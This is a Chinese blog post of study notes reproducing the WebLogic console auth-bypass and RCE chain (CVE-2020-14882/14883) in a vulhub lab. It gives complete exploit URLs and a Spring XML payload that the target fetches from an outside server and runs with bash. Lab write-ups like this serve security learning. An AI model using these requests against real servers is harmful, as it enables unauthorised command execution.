vulhub漏洞—Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

最新推荐文章于 2024-05-14 10:45:34 发布
最新推荐文章于 2024-05-14 10:45:34 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 网络安全 vulhub 学习笔记 文章标签: 安全 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808483/article/details/122038724
版权
学习笔记 同时被 3 个专栏收录
38 篇文章 8 订阅
订阅专栏
网络安全
33 篇文章 7 订阅
订阅专栏
vulhub
12 篇文章 1 订阅
订阅专栏

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

漏洞环境

vulhub : https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md

执行如下命令启动一个Weblogic 12.2.1.3版本的服务器:

docker-compose up -d

启动完成后,访问http://your-ip:7001/console即可查看到后台登录页面。

image-20211220114504452

漏洞复现

首先通过CVE-2020-14882的权限绕过漏洞,未授权访问后台管理页面,通过以下URL访问

http://ip:7001/console/css/%252e%252e%252fconsole.portal

image-20211220114843815

然后通过CVE-2020-14883来执行任意代码执行

CVE-2020-14883有两种利用方法一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

方法一:

com.tangosol.coherence.mvel2.sh.ShellSession方法直接访问以下构造的URL即可利用

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/EDI');")

image-20211220120421513

进入docker容器就会发现创建的文件~,这里靶机是同学搭的就不再放截图了~

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

方法二:

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext方法通用所有

我们需要构建一个xml文件,将其保存在weblogic能访问的服务器上:ip(这里使用的是我自己的服务器):8000/test.xml:

test.xml

<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[touch /tmp/success2]]></value> </list> </constructor-arg> </bean> </beans>

通过python3 -m http.server命令放到外网环境中,默认监听端口8000。

python3 -m http.server

image-20211220121525132

image-20211220122558429

构造URL即可利用

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://ip:8000/test.xml")

image-20211220122413890

同样进入容器,就可以看到创建的文件夹!

ErYao7
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
5.3. Java
Sumarua的博客
07-06 2151
内容索引:5.3. Java5.3.1. 基本概念5.3.1.1. JVM5.3.1.2. JDK5.3.1.3. JMX5.3.1.4. OGNL5.3.1.5. IO模型5.3.1.5.1. BIO5.3.1.5.2. NIO5.3.1.5.3. AIO5.3.2. 框架5.3.2.1. Servlet5.3.2.1.1. 简介5.3.2.1.2. 生命周期为5.3.2.1.3. 接口5.3.2.2. Struts 25.3.2.2.1. 简介5.3.2.2.2. 请求流程5.3.2.2.3. 相关CV
Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1717
Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 582
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理控制台组件上执行任意命令
vulhub漏洞复现】redis 4-unacc 授权访问漏洞
RexHa的博客
03-03 4527
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
weblogic权限绕过CVE-2020-14482&远程命令执行漏洞CVE-2020-14883
weixin_44912035的博客
01-02 874
漏洞危害 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic 管理控制台CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求在远程Weblogic服务器上以授权的任意用户身份执行命令。 影响版本 Weblogic : 10.3.6.0.0 Weblogic : 12.1.3.0.0 Weblogic : 12.2.1.3.0 Weblogic : 12.2.1.4.0
vulhub靶场-weblogic漏洞复现
m0_62008601的博客
07-18 1737
vulhub-weblogic漏洞复现集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
CVE-2020-2883:Weblogic coherence.jar RCE
04-13
CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1464
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞,远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞
爱国小白帽
01-15 3159
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8043
多次跳转导致的ssrf
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9123
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
CVE-2020-14882&14883weblogic授权命令执行漏洞复现
蚁景网安学院
12-08 2270
亲爱的,关注我吧12/8本文字数2498来和我一起阅读吧本文涉及靶场知识点-CVE-2020-14882&14883 weblogic授权访问漏洞https://www.het...
漏洞复现】Weblogic授权命令执行漏洞CVE-2020-14882)
weixin_43486390的博客
12-17 1779
CVE-2020-14882
vulhubWeblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882)漏洞复现
qq_45300786的博客
04-10 383
https://www.cnblogs.com/backlion/p/13951858.html
CVE-2020-14882/14883: Weblogic ConSole HTTP 协议代码执行漏洞通告
爱国小白帽
10-29 3606
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-29 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC已经公开,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HT
CVE-2020-14882漏洞修复
07-28
根据引用\[1\]中提到的Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update),其中包含了修复CVE-2020-14882漏洞的补丁。这个漏洞存在于Weblogic Console中,攻击者可以通过构造特殊的HTTP GET请求,在受影响的WebLogic Server上执行任意代码。因此,为了修复CVE-2020-14882漏洞,您需要安装Oracle发布的最新关键补丁更新。这样可以确保您的系统不再受到该漏洞的影响。 #### 引用[.reference_title] - *1* [CVE-2020-14882:weblogic 授权命令执行漏洞验证及修复](https://blog.csdn.net/weixin_38896449/article/details/110480656)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Weblogic Console远程代码执行漏洞(CVE-2020-14882)](https://blog.csdn.net/weixin_42181573/article/details/117526222)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ErYao7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值